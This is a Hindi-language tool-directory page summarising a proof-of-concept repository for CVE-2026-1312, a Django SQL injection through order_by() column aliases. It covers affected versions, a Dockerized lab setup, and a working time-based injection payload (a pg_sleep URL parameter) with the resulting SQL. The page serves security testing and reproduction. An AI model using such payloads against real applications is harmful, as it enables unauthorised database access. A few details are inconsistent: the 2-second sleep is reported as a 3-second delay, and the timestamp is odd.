Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-1312 — CVE-2026-1312 को पुनः उत्पन्न करता है, जो Django SQL इंजेक्शन भेद्यता है, जिसमें Dockerized वातावरण और सुरक्षा परीक्षण के लिए चरण-दर-चरण PoC शामिल है। | Kitploit
उपकरण/GitHubGitHub/sw0rd1ight/cve-2026-1312
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubsw0rd1ight/cve-2026-1312

CVE-2026-1312

CVE-2026-1312 को पुनः उत्पन्न करता है, जो Django SQL इंजेक्शन भेद्यता है, जिसमें Dockerized वातावरण और सुरक्षा परीक्षण के लिए चरण-दर-चरण PoC शामिल है।

रिपॉजिटरी देखें
226 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-1312 एक उच्च-जोखिम वाला Django SQL इंजेक्शन भेद्यता है: जब QuerySet.order_by() में डॉट वाले कॉलम उपनाम का उपयोग किया जाता है, और FilteredRelation के साथ डिक्शनरी के माध्यम से गतिशील रूप से क्वेरी बनाई जाती है, तो हमलावर द्वारा दुर्भावनापूर्ण SQL इंजेक्ट किया जा सकता है

प्रभावित संस्करण:

  • Django 6.0 शाखा में 6.0.2 से पहले के संस्करण
  • Django 5.2 शाखा में 5.2.11 से पहले के संस्करण
  • Django 4.2 शाखा में 4.2.28 से पहले के संस्करण

पर्यावरण प्रारंभ

यह भेद्यता प्रोजेक्ट vscode के devcontainer का उपयोग करके बनाया गया है

1️⃣ प्रोजेक्ट खोलें VS Code से पहले से मौजूद प्रोजेक्ट रूट निर्देशिका (.devcontainer फ़ोल्डर सहित) खोलें।

2️⃣ कंटेनर फिर से खोलें (Dev Container बनाएं)

Ctrl+Shift+P (Windows/Linux) या Cmd+Shift+P (Mac) दबाएं

Remote-Containers: Reopen in Container टाइप करें

VS Code .devcontainer कॉन्फ़िगरेशन पढ़कर कंटेनर बनाएगा (पहली बार बनाने में कुछ मिनट लग सकते हैं)

⚠️ यदि Dockerfile या निर्भरताएं अपडेट हुई हैं, तो Remote-Containers: Rebuild Container चुनें, ताकि नवीनतम वातावरण सुनिश्चित हो।

3️⃣ Django विकास सर्वर चलाएं

कमांड पैलेट Ctrl+Shift+P खोलें

Tasks: Run Task टाइप करें

django:start चुनें (कार्य .vscode/tasks.json में कॉन्फ़िगर किया गया है)

यह कार्य कंटेनर के अंदर Django विकास सर्वर प्रारंभ करेगा

डिफ़ॉल्ट रूप से 0.0.0.0:8086 पर सुनता है

4️⃣ ब्राउज़र खोलकर प्रोजेक्ट तक पहुंचें

ब्राउज़र खोलकर पहुंचें:

http://localhost:8086

5️⃣ ध्यान देने योग्य बातें

पहली बार चलाने पर:

डेटाबेस माइग्रेशन करने की आवश्यकता हो सकती है:

root@kitploit:~
python manage.py migrate

भेद्यता पुनरुत्पादन

/book/search इंटरफ़ेस तक पहुंचें, http://localhost:8086/book/search?name=vuln_book.id,pg_sleep(2)

तो देखा जा सकता है कि 3 सेकंड की देरी सफलतापूर्वक होती है

इस समय django orm द्वारा संकलित अंतर्निहित sql है

root@kitploit:~
SELECT "vuln_book"."id", "vuln_book"."title", "vuln_book"."author_id" FROM "vuln_book" ORDER BY ("vuln_book".id,pg_sleep(2)) ASC
टूल डाउनलोड करें